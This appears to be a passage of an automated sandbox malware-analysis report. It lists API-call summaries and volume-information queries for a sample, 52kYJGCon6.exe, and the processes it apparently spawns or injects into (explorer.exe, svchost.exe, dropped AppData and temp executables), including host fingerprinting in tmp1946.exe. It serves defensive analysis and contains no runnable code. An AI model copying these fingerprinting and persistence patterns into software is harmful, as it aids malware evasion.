      Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,3_2_10A6CA58
      Source: C:\Windows\explorer.exeCode function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_getptd,GetLocaleInfoEx,3_2_10A75B0C
      Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,3_2_10A6B48C
      Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,3_2_10A73C3C
      Source: C:\Windows\explorer.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_10A73D98
      Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,3_2_10A745EC
      Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,3_2_10A74D74
      Source: C:\Windows\explorer.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,3_2_10A75F78
      Source: C:\Windows\explorer.exeCode function: __crtGetLocaleInfoA,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,_calloc_crt,free,_invoke_watson,3_2_08B8C38D
      Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,3_2_08B8ADC1
      Source: C:\Windows\explorer.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,3_2_08B946A9
      Source: C:\Windows\explorer.exeCode function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,3_2_08B93F21
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson,4_2_00007FF60E63D744
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson,4_2_00007FF60E63DD68
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,4_2_00007FF60E63DBB0
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,GetLocaleInfoEx,_invoke_watson,4_2_00007FF60E633B98
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_00007FF60E63AB7C
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: EnumSystemLocalesEx,4_2_00007FF60E63AC1C
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: GetLocaleInfoEx,4_2_00007FF60E63DC64
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeCode function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,4_2_00007FF60E63AA20
      Source: C:\Windows\System32\svchost.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson,5_2_00007FF60BFADD68
      Source: C:\Windows\System32\svchost.exeCode function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson,5_2_00007FF60BFAD744
      Source: C:\Windows\System32\svchost.exeCode function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,5_2_00007FF60BFAAA20
      Source: C:\Windows\System32\svchost.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,5_2_00007FF60BFAAB7C
      Source: C:\Windows\System32\svchost.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,GetLocaleInfoEx,_invoke_watson,5_2_00007FF60BFA3B98
      Source: C:\Windows\System32\svchost.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,5_2_00007FF60BFADBB0
      Source: C:\Windows\System32\svchost.exeCode function: EnumSystemLocalesEx,5_2_00007FF60BFAAC1C
      Source: C:\Windows\System32\svchost.exeCode function: GetLocaleInfoEx,5_2_00007FF60BFADC64
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,9_2_00007FF8B836FA48
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: GetProcAddress,GetLocaleInfoW,9_2_00007FF8B831DC20
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: EnterCriticalSection,EnumSystemLocalesW,LeaveCriticalSection,9_2_00007FF8B836D2E0
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: EnumSystemLocalesW,9_2_00007FF8B836F35C
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: GetPrimaryLen,EnumSystemLocalesW,9_2_00007FF8B836F3C4
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: GetPrimaryLen,EnumSystemLocalesW,9_2_00007FF8B836F478
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_00007FF8B836F8C0
      Source: C:\Windows\System32\svchost.exeCode function: GetLocaleInfoEx,10_2_00007FF69BEDDC64
      Source: C:\Windows\System32\svchost.exeCode function: EnumSystemLocalesEx,10_2_00007FF69BEDAC1C
      Source: C:\Windows\System32\svchost.exeCode function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,10_2_00007FF69BEDDBB0
      Source: C:\Windows\System32\svchost.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,GetLocaleInfoEx,_invoke_watson,10_2_00007FF69BED3B98
      Source: C:\Windows\System32\svchost.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,10_2_00007FF69BEDAB7C
      Source: C:\Windows\System32\svchost.exeCode function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,10_2_00007FF69BEDAA20
      Source: C:\Windows\System32\svchost.exeCode function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,GetLocaleInfoEx,_invoke_watson,10_2_00007FF69BEDD744
      Source: C:\Windows\System32\svchost.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,_invoke_watson,_invoke_watson,10_2_00007FF69BEDDD68
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: GetSystemInfo,GetUserDefaultUILanguage,GetDesktopWindow,GetClientRect,GetUserNameA,GetComputerNameA,GetVersionExA,GetCurrentHwProfileA,GetModuleFileNameA,GetLocaleInfoEx,GetSystemFirmwareTable,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SetCurrentDirectoryW,CreateDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,CreateDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,CreateDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,GetSystemMetrics,CreateDirectoryW,SetCurrentDirectoryW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,11_2_00007FF68396E23C
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: GetLocaleInfoW,11_2_00007FF68395C348
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,11_2_00007FF6839653E4
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,11_2_00007FF6839658A8
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: EnumSystemLocalesW,11_2_00007FF683965810
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: EnumSystemLocalesW,11_2_00007FF683965740
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: GetLocaleInfoW,11_2_00007FF683965CF8
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_00007FF683965C48
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: GetLocaleInfoW,11_2_00007FF683965AF0
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_00007FF683965E2C
      Source: C:\Users\user\AppData\Local\Temp\tmp1946.exeCode function: EnumSystemLocalesW,11_2_00007FF68395BDB0
      Source: C:\Users\user\Desktop\52kYJGCon6.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\52kYJGCon6.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Roaming\8D8EBC2422383023011859\8D8EBC2422383023011859.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\ucrtbase.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp8AEF.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp8AEF.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\_ctypes.pyd VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp8AEF.exe VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-console-l1-1-0.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-datetime-l1-1-0.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-file-l2-1-0.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-libraryloader-l1-1-0.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-localization-l1-2-0.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-memory-l1-1-0.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-namedpipe-l1-1-0.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-profile-l1-1-0.dll VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\tmp8AEF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\api-ms-win-core-util-l1-1-0.dll VolumeInformationJump to behavior
